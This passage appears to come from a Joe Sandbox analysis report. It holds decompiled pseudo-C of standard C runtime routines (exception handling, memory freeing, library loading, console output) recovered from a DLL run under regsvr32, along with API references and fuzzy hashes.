    													if(__eflags != 0) {
    														_push(1);
    														E6F84AB2E(_t274, _t305, _t319, __eflags);
    														_t279 = _t274;
    													}
    													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
    													if(( *_t305 & 0x1fffffff) < 0x19930521) {
    														L59:
    														_t225 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
    														__eflags =  *(_t225 + 0x1c);
    														if( *(_t225 + 0x1c) != 0) {
    															goto L66;
    														} else {
    															goto L60;
    														}
    													} else {
    														__eflags = _t305[7];
    														if(_t305[7] != 0) {
    															L52:
    															_t229 = _t305[8] >> 2;
    															__eflags = _t229 & 0x00000001;
    															if((_t229 & 0x00000001) == 0) {
    																_push(_t305[7]);
    																_t230 = E6F84BADA(_t274, _t305, _t319, _t274);
    																_pop(_t279);
    																__eflags = _t230;
    																if(_t230 == 0) {
    																	goto L63;
    																} else {
    																	goto L59;
    																}
    															} else {
    																 *(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
    																_t238 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
    																_t290 = _v8;
    																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
    																goto L61;
    															}
    														} else {
    															_t245 = _t305[8] >> 2;
    															__eflags = _t245 & 0x00000001;
    															if((_t245 & 0x00000001) == 0) {
    																goto L59;
    															} else {
    																__eflags = _a28;
    																if(_a28 != 0) {
    																	goto L59;
    																} else {
    																	goto L52;
    																}
    															}
    														}
    													}
    												} else {
    													__eflags = _t274[0x14] - 0x19930521;
    													if(_t274[0x14] == 0x19930521) {
    														goto L29;
    													} else {
    														__eflags = _t274[0x14] - 0x19930522;
    														if(_t274[0x14] != 0x19930522) {
    															goto L56;
    														} else {
    															goto L29;
    														}
    													}
    												}
    											}
    										}
    									} else {
    										_v16 =  *((intOrPtr*)(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x1c));
    										_t268 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
    										_push(_v16);
    										 *(_t268 + 0x1c) = _t319;
    										_t269 = E6F84BADA(_t274, _t305, _t319, _t274);
    										_pop(_t290);
    										if(_t269 != 0) {
    											goto L23;
    										} else {
    											_t305 = _v16;
    											_t356 =  *_t305 - _t319;
    											if( *_t305 <= _t319) {
    												L61:
    												E6F84D3B8(_t274, _t290, _t300, _t305, _t319, __eflags);
    											} else {
    												while(1) {
    													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
    													if(E6F84B76E( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6f85c920) != 0) {
    														goto L62;
    													}
    													_t319 = _t319 + 0x10;
    													_t273 = _v20 + 1;
    													_v20 = _t273;
    													_t356 = _t273 -  *_t305;
    													if(_t273 >=  *_t305) {
    														goto L61;
    													} else {
    														continue;
    													}
    													goto L62;
    												}
    											}
    											L62:
    											_push(1);
    											_push(_t274);
    											E6F84AB2E(_t274, _t305, _t319, __eflags);
    											_t279 =  &_v64;
    											E6F84B756( &_v64);
    											E6F84A50C( &_v64, 0x6f85a7ac);
    											L63:
    											 *(E6F84AD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
    											_t232 = E6F84AD86(_t274, _t279, _t300, _t305, _t319);
    											_t279 = _v8;
    											 *(_t232 + 0x14) = _v8;
    											__eflags = _t319;
    											if(_t319 == 0) {
    												_t319 = _a8;
    											}
    											E6F84A76B(_t279, _t319, _t274);
    											E6F84B9DA(_a8, _a16, _t305);
    											_t235 = E6F84BB97(_t305);
    											_t335 = _t335 + 0x10;
    											_push(_t235);
    											E6F84B951(_t274, _t279, _t300, _t305, _t319, __eflags);
    											goto L66;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}
    0x6f84b231
    0x00000000
    0x6f84b237
    0x6f84b237
    0x6f84b23e
    0x6f84b256
    0x6f84b256
    0x6f84b259
    0x6f84b25c
    0x6f84b262
    0x6f84b272
    0x6f84b277
    0x6f84b27a
    0x6f84b27d
    0x6f84b280
    0x6f84b283
    0x6f84b286
    0x6f84b289
    0x6f84b28f
    0x6f84b28f
    0x6f84b292
    0x6f84b295
    0x6f84b2a4
    0x6f84b2a5
    0x6f84b2a5
    0x6f84b2a7
    0x6f84b2aa
    0x6f84b2b0
    0x6f84b2b3
    0x6f84b2b9
    0x6f84b2bb
    0x6f84b2be
    0x6f84b2c1
    0x6f84b2ca
    0x6f84b2cd
    0x6f84b2cf
    0x6f84b2cf
    0x6f84b2d2
    0x6f84b2d5
    0x6f84b2d8
    0x6f84b2db
    0x6f84b2de
    0x6f84b2e3
    0x6f84b2e4
    0x6f84b2e5
    0x6f84b2e6
    0x6f84b2e7
    0x6f84b2ea
    0x6f84b2ec
    0x6f84b2ee
    0x00000000
    0x6f84b2f0
    0x6f84b2f0
    0x6f84b2f0
    0x6f84b2f3
    0x6f84b2f6
    0x6f84b2f8
    0x6f84b2f9
    0x6f84b2fe
    0x6f84b301
    0x6f84b303
    0x00000000
    0x00000000
    0x6f84b305
    0x6f84b306
    0x6f84b309
    0x6f84b30b
    0x00000000
    0x6f84b30d
    0x6f84b30d
    0x6f84b310
    0x6f84b313
    0x00000000
    0x6f84b313
    0x00000000
    0x6f84b30b
    0x6f84b327
    0x6f84b32d
    0x6f84b34a
    0x6f84b34f
    0x6f84b34f
    0x6f84b352
    0x6f84b352
    0x00000000
    0x6f84b316
    0x6f84b316
    0x6f84b317
    0x6f84b31a
    0x6f84b31d
    0x6f84b320
    0x6f84b320
    0x00000000
    0x6f84b325
    0x6f84b2c1
    0x6f84b2b3
    0x6f84b355
    0x6f84b358
    0x6f84b359
    0x6f84b35c
    0x6f84b35f
    0x6f84b362
    0x6f84b365
    0x6f84b365
    0x6f84b36e
    0x6f84b371
    0x6f84b371
    0x6f84b289
    0x6f84b374
    0x6f84b378
    0x6f84b37a
    0x6f84b37d
    0x6f84b383
    0x6f84b383
    0x6f84b38b
    0x6f84b390
    0x6f84b3fe
    0x6f84b3fe
    0x6f84b403
    0x6f84b407
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6f84b392
    0x6f84b392
    0x6f84b396
    0x6f84b3a8
    0x6f84b3ab
    0x6f84b3ae
    0x6f84b3b0
    0x6f84b3c7
    0x6f84b3cb
    0x6f84b3d1
    0x6f84b3d2
    0x6f84b3d4
    0x00000000
    0x6f84b3d6
    0x00000000
    0x6f84b3d6
    0x6f84b3b2
    0x6f84b3b7
    0x6f84b3ba
    0x6f84b3bf
    0x6f84b3c2
    0x00000000
    0x6f84b3c2
    0x6f84b398
    0x6f84b39b
    0x6f84b39e
    0x6f84b3a0
    0x00000000
    0x6f84b3a2
    0x6f84b3a2
    0x6f84b3a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6f84b3a6
    0x6f84b3a0
    0x6f84b396
    0x6f84b240
    0x6f84b240
    0x6f84b247
    0x00000000
    0x6f84b249
    0x6f84b249
    0x6f84b250
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6f84b250
    0x6f84b247
    0x6f84b23e
    0x6f84b231
    0x6f84b1b1
    0x6f84b1b9
    0x6f84b1bc
    0x6f84b1c1
    0x6f84b1c5
    0x6f84b1c8
    0x6f84b1ce
    0x6f84b1d1
    0x00000000
    0x6f84b1d3
    0x6f84b1d3
    0x6f84b1d6
    0x6f84b1d8
    0x6f84b40e
    0x6f84b40e
    0x00000000
    0x6f84b1de
    0x6f84b1e6
    0x6f84b1f1
    0x00000000
    0x00000000
    0x6f84b1fa
    0x6f84b1fd
    0x6f84b1fe
    0x6f84b201
    0x6f84b203
    0x00000000
    0x6f84b209
    0x00000000
    0x6f84b209
    0x00000000
    0x6f84b203
    0x6f84b1de
    0x6f84b413
    0x6f84b413
    0x6f84b415
    0x6f84b416
    0x6f84b41d
    0x6f84b420
    0x6f84b42e
    0x6f84b433
    0x6f84b438
    0x6f84b43b
    0x6f84b440
    0x6f84b443
    0x6f84b446
    0x6f84b448
    0x6f84b44a
    0x6f84b44a
    0x6f84b44f
    0x6f84b45b
    0x6f84b461
    0x6f84b466
    0x6f84b469
    0x6f84b46a
    0x00000000
    0x6f84b46a
    0x6f84b1d1
    0x6f84b1af
    0x6f84b16f
    0x6f84b150
    0x6f84b142
    0x6f84b10e

    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6F84B1C8
    • type_info::operator==.LIBVCRUNTIME ref: 6F84B1EA
    • ___TypeMatch.LIBVCRUNTIME ref: 6F84B2F9
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6F84B3CB
    • _UnwindNestedFrames.LIBCMT ref: 6F84B44F
    • CallUnexpected.LIBVCRUNTIME ref: 6F84B46A
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 2123188842-393685449
    • Opcode ID: bc0a44b507778ac71b275a05a9895bc8a71cb47321c9638bad6c6b193358b432
    • Instruction ID: 2d76626450b2f077de3d38ac73009c40dd6b060d900e6b47dcc7b50405e3e389
    • Opcode Fuzzy Hash: bc0a44b507778ac71b275a05a9895bc8a71cb47321c9638bad6c6b193358b432
    • Instruction Fuzzy Hash: AFB1367180021DEFCF19CFA9C980A9EBBB5FF05315F1049AAE8246F251D735EA51CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E6F84D878(void* __ebx, void* __edi, void* __esi, char _a4) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char _v20;
    				void* __ebp;
    				char _t55;
    				char _t61;
    				void* _t67;
    				intOrPtr _t68;
    				void* _t72;
    				void* _t73;
    
    				_t73 = __esi;
    				_t72 = __edi;
    				_t67 = __ebx;
    				_t36 = _a4;
    				_t68 =  *_a4;
    				_t77 = _t68 - 0x6f855f50;
    				if(_t68 != 0x6f855f50) {
    					E6F84DC0E(_t68);
    					_t36 = _a4;
    				}
    				E6F84DC0E( *((intOrPtr*)(_t36 + 0x3c)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x30)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x34)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x38)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x28)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x2c)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x40)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x44)));
    				E6F84DC0E( *((intOrPtr*)(_a4 + 0x360)));
    				_v16 =  &_a4;
    				_t55 = 5;
    				_v12 = _t55;
    				_v20 = _t55;
    				_push( &_v12);
    				_push( &_v16);
    				_push( &_v20);
    				E6F84D6A4(_t67, _t72, _t73, _t77);
    				_v16 =  &_a4;
    				_t61 = 4;
    				_v20 = _t61;
    				_v12 = _t61;
    				_push( &_v20);
    				_push( &_v16);
    				_push( &_v12);
    				return E6F84D70F(_t67, _t72, _t73, _t77);
    			}


    APIs
    • _free.LIBCMT ref: 6F84D88E
      • Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
      • Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36
    • _free.LIBCMT ref: 6F84D89A
    • _free.LIBCMT ref: 6F84D8A5
    • _free.LIBCMT ref: 6F84D8B0
    • _free.LIBCMT ref: 6F84D8BB
    • _free.LIBCMT ref: 6F84D8C6
    • _free.LIBCMT ref: 6F84D8D1
    • _free.LIBCMT ref: 6F84D8DC
    • _free.LIBCMT ref: 6F84D8E7
    • _free.LIBCMT ref: 6F84D8F5
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 392f778bb74906e963d558d04c02d9930812114c8bfa60f79a13f0a68031c45c
    • Instruction ID: f369a3e8dcd6d1a6416abeca6579eef55ca8d49d31ed81bf8306a948e0523a2a
    • Opcode Fuzzy Hash: 392f778bb74906e963d558d04c02d9930812114c8bfa60f79a13f0a68031c45c
    • Instruction Fuzzy Hash: 2421877694020CFFCB52DF98C840DDE7BB9AF48344B0145A6E5199F260EB71EA55CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E6F84A9D0(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v5;
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v32;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t68;
    				signed int _t75;
    				intOrPtr _t76;
    				void* _t77;
    				signed int _t78;
    				intOrPtr _t80;
    				signed int _t83;
    				signed int _t87;
    				intOrPtr* _t90;
    				intOrPtr _t91;
    				signed int _t94;
    				char _t96;
    				signed int _t102;
    				signed int _t103;
    				signed int _t110;
    				void* _t111;
    				intOrPtr _t112;
    				signed int _t113;
    				signed int _t115;
    				void* _t116;
    				void* _t117;
    				void* _t123;
    
    				_t107 = __edx;
    				_t90 = _a4;
    				_v5 = 0;
    				_v16 = 1;
    				 *_t90 = E6F854630(__ecx,  *_t90);
    				_t91 = _a8;
    				_t6 = _t91 + 0x10; // 0x11
    				_t113 = _t6;
    				_push(_t113);
    				_v20 = _t113;
    				_v12 =  *(_t91 + 8) ^  *0x6f85c024;
    				E6F84A990(_t91, __edx, _t111, _t113,  *(_t91 + 8) ^  *0x6f85c024);
    				E6F84BBFC(_a12);
    				_t68 = _a4;
    				_t117 = _t116 + 0x10;
    				_t112 =  *((intOrPtr*)(_t91 + 0xc));
    				if(( *(_t68 + 4) & 0x00000066) != 0) {
    					__eflags = _t112 - 0xfffffffe;
    					if(_t112 != 0xfffffffe) {
    						_t107 = 0xfffffffe;
    						E6F84BDF0(_t91, 0xfffffffe, _t113, 0x6f85c024);
    						goto L13;
    					}
    					goto L14;
    				} else {
    					_v32 = _t68;
    					_v28 = _a12;
    					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
    					if(_t112 == 0xfffffffe) {
    						L14:
    						return _v16;
    					} else {
    						do {
    							_t94 = _v12;
    							_t75 = _t112 + (_t112 + 2) * 2;
    							_t91 =  *((intOrPtr*)(_t94 + _t75 * 4));
    							_t76 = _t94 + _t75 * 4;
    							_t95 =  *((intOrPtr*)(_t76 + 4));
    							_v24 = _t76;
    							if( *((intOrPtr*)(_t76 + 4)) == 0) {
    								_t96 = _v5;
    								goto L7;
    							} else {
    								_t107 = _t113;
    								_t77 = E6F84BD90(_t95, _t113);
    								_t96 = 1;
    								_v5 = 1;
    								_t123 = _t77;
    								if(_t123 < 0) {
    									_v16 = 0;
    									L13:
    									_push(_t113);
    									E6F84A990(_t91, _t107, _t112, _t113, _v12);
    									goto L14;
    								} else {
    									if(_t123 > 0) {
    										_t78 = _a4;
    										__eflags =  *_t78 - 0xe06d7363;
    										if( *_t78 == 0xe06d7363) {
    											__eflags =  *0x6f855474;
    											if(__eflags != 0) {
    												_t87 = E6F8544D0(__eflags, 0x6f855474);
    												_t117 = _t117 + 4;
    												__eflags = _t87;
    												if(_t87 != 0) {
    													_t115 =  *0x6f855474; // 0x6f84ab2e
    													 *0x6f8551b8(_a4, 1);
    													 *_t115();
    													_t113 = _v20;
    													_t117 = _t117 + 8;
    												}
    												_t78 = _a4;
    											}
    										}
    										_t108 = _t78;
    										E6F84BDD0(_t78, _a8, _t78);
    										_t80 = _a8;
    										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t112;
    										if( *((intOrPtr*)(_t80 + 0xc)) != _t112) {
    											_t108 = _t112;
    											E6F84BDF0(_t80, _t112, _t113, 0x6f85c024);
    											_t80 = _a8;
    										}
    										_push(_t113);
    										 *((intOrPtr*)(_t80 + 0xc)) = _t91;
    										E6F84A990(_t91, _t108, _t112, _t113, _v12);
    										E6F84BDB0();
    										asm("int3");
    										_push(8);
    										_push(0x6f85a6a8);
    										E6F849960(_t91, _t112, _t113);
    										_t83 = _a4;
    										__eflags = _t83;
    										if(_t83 != 0) {
    											__eflags =  *_t83 - 0xe06d7363;
    											if( *_t83 == 0xe06d7363) {
    												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
    												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
    													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
    													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
    														L29:
    														_t102 =  *(_t83 + 0x1c);
    														__eflags = _t102;
    														if(_t102 != 0) {
    															_t110 =  *(_t102 + 4);
    															__eflags = _t110;
    															if(_t110 == 0) {
    																__eflags =  *_t102 & 0x00000010;
    																if(( *_t102 & 0x00000010) != 0) {
    																	_t83 =  *(_t83 + 0x18);
    																	_t103 =  *_t83;
    																	__eflags = _t103;
    																	if(_t103 != 0) {
    																		 *0x6f8551b8(_t103);
    																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
    																	}
    																}
    															} else {
    																_t54 =  &_v8;
    																 *_t54 = _v8 & 0x00000000;
    																__eflags =  *_t54;
    																_t83 = E6F84ABCF( *(_t83 + 0x18), _t110);
    																_v8 = 0xfffffffe;
    															}
    														}
    													} else {
    														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
    														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
    															goto L29;
    														} else {
    															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
    															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
    																goto L29;
    															}
    														}
    													}
    												}
    											}
    										}
    										 *[fs:0x0] = _v20;
    										return _t83;
    									} else {
    										goto L7;
    									}
    								}
    							}
    							goto L37;
    							L7:
    							_t112 = _t91;
    						} while (_t91 != 0xfffffffe);
    						if(_t96 != 0) {
    							goto L13;
    						}
    						goto L14;
    					}
    				}
    				L37:
    			}


    APIs
    • _ValidateLocalCookies.LIBCMT ref: 6F84AA07
    • ___except_validate_context_record.LIBVCRUNTIME ref: 6F84AA0F
    • _ValidateLocalCookies.LIBCMT ref: 6F84AA98
    • __IsNonwritableInCurrentImage.LIBCMT ref: 6F84AAC3
    • _ValidateLocalCookies.LIBCMT ref: 6F84AB18
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: ed5398c53bcb1de0e0a4801a29d772d0212e4ac079169ed7f034b5be1b187b98
    • Instruction ID: 4c9fa3a732853f1530e56018329829d84e59c0d6292442c93638927a6be0bc57
    • Opcode Fuzzy Hash: ed5398c53bcb1de0e0a4801a29d772d0212e4ac079169ed7f034b5be1b187b98
    • Instruction Fuzzy Hash: E6414334A0020DABCF04CF6CC945A9E7BF5AF45328F1089E5D9159F392D735AA16CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F84DCF3(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				signed int* _v8;
    				void** _t12;
    				void* _t16;
    				void* _t18;
    				signed int _t22;
    				WCHAR* _t23;
    				void** _t26;
    				signed int* _t29;
    				void* _t32;
    				void* _t34;
    
    				_t29 = _a4;
    				while(_t29 != _a8) {
    					_t22 =  *_t29;
    					_t12 = 0x6f85d560 + _t22 * 4;
    					_t32 =  *_t12;
    					_v8 = _t12;
    					if(_t32 == 0) {
    						_t23 =  *(0x6f856200 + _t22 * 4);
    						_t32 = LoadLibraryExW(_t23, 0, 0x800);
    						if(_t32 != 0) {
    							L12:
    							_t26 = _v8;
    							 *_t26 = _t32;
    							if( *_t26 != 0) {
    								FreeLibrary(_t32);
    							}
    							L14:
    							if(_t32 != 0) {
    								_t16 = _t32;
    								L18:
    								return _t16;
    							}
    							L15:
    							_t29 =  &(_t29[1]);
    							continue;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L9:
    							_t32 = 0;
    							L10:
    							if(_t32 != 0) {
    								goto L12;
    							}
    							 *_v8 = _t18 | 0xffffffff;
    							goto L15;
    						}
    						_t18 = E6F84D618(_t23, L"api-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = E6F84D618(_t23, L"ext-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = LoadLibraryExW(_t23, _t32, _t32);
    						_t32 = _t18;
    						goto L10;
    					}
    					if(_t32 == 0xffffffff) {
    						goto L15;
    					}
    					goto L14;
    				}
    				_t16 = 0;
    				goto L18;
    			}


    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: 2dcdf5c5f8a9d152977f2f7fac4ad2e4034413afea350a2e6b73803d990c720a
    • Instruction ID: 6a864b2d196bbc4965ed7d20344658adaff4d60eecc906a38ef099da5525bbfc
    • Opcode Fuzzy Hash: 2dcdf5c5f8a9d152977f2f7fac4ad2e4034413afea350a2e6b73803d990c720a
    • Instruction Fuzzy Hash: A921A273A4572CABDF569A788C44F8A37AA9F42774F110AD1EC16AF280E730F910C5E0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6F8519AC(intOrPtr _a4) {
    				void* _t18;
    
    				_t45 = _a4;
    				if(_a4 != 0) {
    					E6F851974(_t45, 7);
    					E6F851974(_t45 + 0x1c, 7);
    					E6F851974(_t45 + 0x38, 0xc);
    					E6F851974(_t45 + 0x68, 0xc);
    					E6F851974(_t45 + 0x98, 2);
    					E6F84DC0E( *((intOrPtr*)(_t45 + 0xa0)));
    					E6F84DC0E( *((intOrPtr*)(_t45 + 0xa4)));
    					E6F84DC0E( *((intOrPtr*)(_t45 + 0xa8)));
    					E6F851974(_t45 + 0xb4, 7);
    					E6F851974(_t45 + 0xd0, 7);
    					E6F851974(_t45 + 0xec, 0xc);
    					E6F851974(_t45 + 0x11c, 0xc);
    					E6F851974(_t45 + 0x14c, 2);
    					E6F84DC0E( *((intOrPtr*)(_t45 + 0x154)));
    					E6F84DC0E( *((intOrPtr*)(_t45 + 0x158)));
    					E6F84DC0E( *((intOrPtr*)(_t45 + 0x15c)));
    					return E6F84DC0E( *((intOrPtr*)(_t45 + 0x160)));
    				}
    				return _t18;
    			}





    APIs
      • Part of subcall function 6F851974: _free.LIBCMT ref: 6F851999
    • _free.LIBCMT ref: 6F8519FA
      • Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
      • Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36
    • _free.LIBCMT ref: 6F851A05
    • _free.LIBCMT ref: 6F851A10
    • _free.LIBCMT ref: 6F851A64
    • _free.LIBCMT ref: 6F851A6F
    • _free.LIBCMT ref: 6F851A7A
    • _free.LIBCMT ref: 6F851A85
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
    • Instruction ID: f3583daa01008669c110712b223fb90102a6bfc14c54cd624bb49c16a0f931ee
    • Opcode Fuzzy Hash: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
    • Instruction Fuzzy Hash: D9119DB2540B08FBDB61EBB4CC09FDB779D5F01308F800D55A2A9AF5D1DB64B81A8680
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E6F850921(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				char _v23;
    				char _v24;
    				void _v32;
    				signed int _v33;
    				signed char _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				char _v51;
    				void _v52;
    				long _v56;
    				char _v60;
    				intOrPtr _v68;
    				char _v72;
    				struct _OVERLAPPED* _v76;
    				signed char _v80;
    				signed int _v84;
    				signed int _v88;
    				char _v92;
    				intOrPtr _v96;
    				long _v100;
    				signed char* _v104;
    				signed char* _v108;
    				void* _v112;
    				intOrPtr _v116;
    				char _v120;
    				int _v124;
    				intOrPtr _v128;
    				struct _OVERLAPPED* _v132;
    				struct _OVERLAPPED* _v136;
    				struct _OVERLAPPED* _v140;
    				struct _OVERLAPPED* _v144;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t170;
    				signed int _t172;
    				int _t178;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				long _t193;
    				void _t198;
    				signed char* _t202;
    				void* _t206;
    				struct _OVERLAPPED* _t211;
    				void* _t220;
    				long _t224;
    				intOrPtr _t225;
    				char _t227;
    				void* _t237;
    				signed int _t242;
    				intOrPtr _t245;
    				signed int _t248;
    				signed int _t249;
    				signed int _t251;
    				intOrPtr _t253;
    				void* _t259;
    				intOrPtr _t260;
    				signed int _t261;
    				signed char _t264;
    				intOrPtr _t267;
    				signed char* _t269;
    				signed int _t272;
    				signed int _t273;
    				signed int _t277;
    				signed int _t278;
    				intOrPtr _t279;
    				signed int _t280;
    				struct _OVERLAPPED* _t282;
    				struct _OVERLAPPED* _t284;
    				signed int _t285;
    				void* _t286;
    				void* _t287;
    
    				_t170 =  *0x6f85c024; // 0x17ad5049
    				_v8 = _t170 ^ _t285;
    				_t172 = _a8;
    				_t264 = _t172 >> 6;
    				_t242 = (_t172 & 0x0000003f) * 0x38;
    				_t269 = _a12;
    				_v108 = _t269;
    				_v80 = _t264;
    				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x6f85d638 + _t264 * 4)) + 0x18));
    				_v44 = _t242;
    				_v96 = _a16 + _t269;
    				_t178 = GetConsoleOutputCP();
    				_t241 = 0;
    				_v124 = _t178;
    				E6F84C407( &_v72, _t264, 0);
    				_t273 = 0;
    				_v92 = 0;
    				_v88 = 0;
    				_v84 = 0;
    				_t245 =  *((intOrPtr*)(_v68 + 8));
    				_v128 = _t245;
    				_v104 = _t269;
    				if(_t269 >= _v96) {
    					L48:
    					__eflags = _v60 - _t241;
    				} else {
    					while(1) {
    						_t248 = _v44;
    						_v51 =  *_t269;
    						_v76 = _t241;
